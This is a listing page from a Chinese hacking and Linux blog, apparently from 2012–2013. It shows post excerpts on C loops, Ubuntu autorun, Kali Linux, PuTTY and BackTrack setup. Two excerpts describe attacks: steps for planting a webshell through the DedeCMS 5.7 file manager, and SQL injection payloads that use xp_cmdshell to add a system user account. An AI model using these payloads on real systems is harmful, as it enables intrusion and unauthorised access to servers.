上一页 1 ··· 3 4 5 6 7
2013年3月31日
sql学习笔记(要够长)
摘要: 普通注入黑客攻防 零基础学习什么是注入 Whats SQL Injection代码无罪 - 是你又是你还是你,从注入谈起 注入这个词自从数据库与动态脚本诞生至今日,一直是黑客们乐不此彼的谈论话题,现在Injection的思想已经不仅仅限于SQL当中,File Include,Command Exec... 阅读全文
posted @ 2013-03-31 20:01 Crack's_Blog 阅读(235) 评论(0) 推荐(0)
dedecms 5.7后台拿WEBSHELL
摘要: 由于系统自带的文件管理器插件没有过滤文件上传及编辑后保存的文件名, 导致直接写入webshell漏洞。 漏洞测试: 1、进入后台,默认的是dede www.xxxx.com/dede 左边导航栏目,选择模块>辅助插件>文件管理器 (系统默认安装的,如果没有请在插件管理器中自行安装)>然后选择新建文本(或者文件上传) 如上图:文件名称随便填,例如1.php;内容出填... 阅读全文
posted @ 2013-03-31 19:49 Crack's_Blog 阅读(1704) 评论(0) 推荐(0)
sql注入语句大全
摘要: sql注入语句大全--是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') --用xp_cmdshell执行命令 ;exec master..xp_cmdshell "net user name password /add"--... 阅读全文
posted @ 2013-03-31 12:55 Crack's_Blog 阅读(71214) 评论(0) 推荐(3)
2013年3月20日
第五章——循环结构5.1
摘要: /*实例*/#include <stdio.h>main(){int i,sum;i=1;sum=1;while(i<100){i++;sum=sum+i;}printf("sum=%d\n",sum);}/*实例*/#include <stdio.h>main(){int i,sum;i=1;sum=0;while(i<100){i++;sum=sum+... 阅读全文
posted @ 2013-03-20 17:52 Crack's_Blog 阅读(185) 评论(0) 推荐(0)
Ubuntu自动运行脚本
摘要: ①开机自动运行: 先写了测试脚本,在/usr下,trans.sh gedit /etc/init.d/rc.local 在最后加上脚本的地址就OK了 ②定时运行脚本: 以下部分转自:http://hi.baidu.com/michaelxdt/item/a8e4fec22a59867388ad9e62 cron,是一个Linux定时执行工具,可以在无需人工干预的情况下运行作业。 ... 阅读全文
posted @ 2013-03-20 13:37 Crack's_Blog 阅读(3015) 评论(0) 推荐(0)
2013年3月18日
Kali Linux 1.0
摘要: BackTrack下一代产品 Kali Linux 正式发布对外发布1.0版本,也算是一个大更新了. 还没下载的速度下载体验吧. kali linux正式发布,开放下载,含中文版 期待已久的backtrack下一个版本kali linux终于面世了。 kali-linux-1.0版本包含i386平台、amd64平台、armel平台、armhf平台 镜像包括ISO版本和VMWare版本; 桌面管理器分为Gnome和MINI ISO,应该是无桌面环境的版本。 什么是Kali Linux? Kali是BackTrackLinux完全遵循Debian开发标准彻底的完全重建.全新的目录框架,复查并打包所 阅读全文
posted @ 2013-03-18 21:58 Crack's_Blog 阅读(5006) 评论(0) 推荐(0)
常用putty命令汇总
摘要: 此文介绍putty软件中shell主要的命令语法以及格式,希望对使用putty的朋友们有所帮助。使用简介:把Putty下载到机器上,双击putty.exe,就出现如图1的配置界面。选择“Session”,在“Host Name (or IP address)”输入框中输入欲访问的主机名或IP,比如server1或192.168.9.4。端口号(Port)根据使用的协议有所区别,ssh默认使用22,telnet默认使用23,rlogin默认使用513。在“Protocol”单选栏中选择使用的协议,一般是telnet或ssh,这取决于服务器提供的服务。在“Saved Session”输入栏中输入任 阅读全文
posted @ 2013-03-18 15:59 Crack's_Blog 阅读(3476) 评论(0) 推荐(0)
backtrack安装优化过程
摘要: 打开终端gedit /etc/apt/sources.list粘贴backtrack源<中科大>32位sudo gedit /etc/apt/sources.list添加源列表:deb http://mirrors.ustc.edu.cn/backtrack/source revolution main microverse non-free testingdeb http://mirrors.ustc.edu.cn/backtrack/all revolution main microverse non-free testingdeb http://mirrors.ustc.ed 阅读全文
posted @ 2013-03-18 15:52 Crack's_Blog 阅读(968) 评论(0) 推荐(0)
2012年11月9日
原创【bt5非官网版本】 在虚拟机下无法连接网络的解决方案
摘要: 原创【bt5非官网版本】 在虚拟机下无法连接网络的解决方案折腾了好几天终于解决了这个问题。。。虚拟机用的精简版bug是少不了尤其这个联网问题。。把我折腾的不行。但是官方版本。。。占用系统资源太厉厉害问题描述:内网、内置网卡、非无线、虚拟机、bt5.iso均为民间修改版本进入正题==============================================================首先打开bt5点击设置关闭bt5保存修改输入命令/etc/init.d/networkingrestart重启网络命令行下输入apt-getinstalldhcpcd【如果不能获取重启虚拟机】更新自 阅读全文
posted @ 2012-11-09 21:47 Crack's_Blog 阅读(3100) 评论(0) 推荐(0)
上一页 1 ··· 3 4 5 6 7